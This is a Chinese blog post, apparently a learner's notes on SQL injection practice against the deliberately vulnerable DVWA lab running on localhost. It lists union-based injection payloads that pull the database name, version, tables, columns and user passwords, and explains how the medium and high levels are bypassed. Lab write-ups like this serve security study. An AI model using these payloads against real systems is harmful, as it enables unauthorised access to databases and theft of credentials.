当前位置:Gxlcms > 数据库问题 > DVWA 安装使用 & SQL注入学习心得(一)

DVWA 安装使用 & SQL注入学习心得(一)

时间:2021-07-01 10:21:17 帮助过:19人阅读

,已下是测试过常用的部分
  • 1‘ union select 1,database()# 爆出数据库名称:dvwa
  • 1 ‘UNION ALL SELECT version(),1# 爆出运行的mysql版本
  • 1 ‘UNION ALL SELECT table_name,2 FROM information_schema.tables# 爆出所有表名(此时是所有库里的)
  • 1‘ union select 1,table_name from information_schema.tables where TABLE_SCHEMA=‘dvwa‘# 爆出所有表名(dvwa库里的)
  • 1‘ union select 1,column_name from information_schema.columns where table_name=‘users‘# 根据爆出的表,去查找所有列
  • 1‘ union select user,password from users# 根据所有的列名,查找需要的对应的内容(这里我把那两个显式的输出分别输出user,password)

总结:到这里low等级注入攻击结束,已经得到需要的全部密码了,先用单引号和and测试是否有注入点,然后暴库,根据库暴表,根据表暴列,根据列找到所需的所有内容。

【2】medium

第一步,分析,medium级别是一个下拉列表,当改变输入时,网址http://127.0.0.1/dvwa/vulnerabilities/sqli/#,可见多了#,但是无论怎么改网址都不变,所以应该不是get型,而是post型。

第二步,用hackbar测试一下(这里留一个关于hackbar的坑),在post中输入 id=3&Submit=Submit,运行发现,输出正确,post型注入可行!

第三步,这时候就已经跟low等级一样了,在id=之后输入注入查询代码即可,注意此时 ‘ 和 # 提示错误,推测是源代码进行了处理,所以去掉继续尝试,可行!到这里medium就解决了

总结:难度主要体现在下拉列表上和输入检查上,可以通过工具避开,其他原理跟low一样,除了hackbar还有burp suite也可以实现,这里留着之后专门再研究这两个工具,留坑

【3】high

high等级很奇怪,我发现方法跟low完全一样,唯一的问题是,change id需要从新的窗口输入,输入内容上跟low完全一样。暂时还没明白跟low等级的区别。留坑对四个等级源代码进行对比分析

【4】impossible

impossible等级用的pdo,目前貌似是没法注入

 


 

推荐两篇博客,我感觉写的非常好!

【总结】MYSQL注入 - Carrypan - 博客园

史上最完整的MySQL注入 - i春秋学院 - 博客园

 

以上,接下来是SQL盲注的的部分,同时一边填上面的坑。

DVWA 安装使用 & SQL注入学习心得(一)

标签:conf   info   输出内容   查询   http   笔记   get   sql   简介   

人气教程排行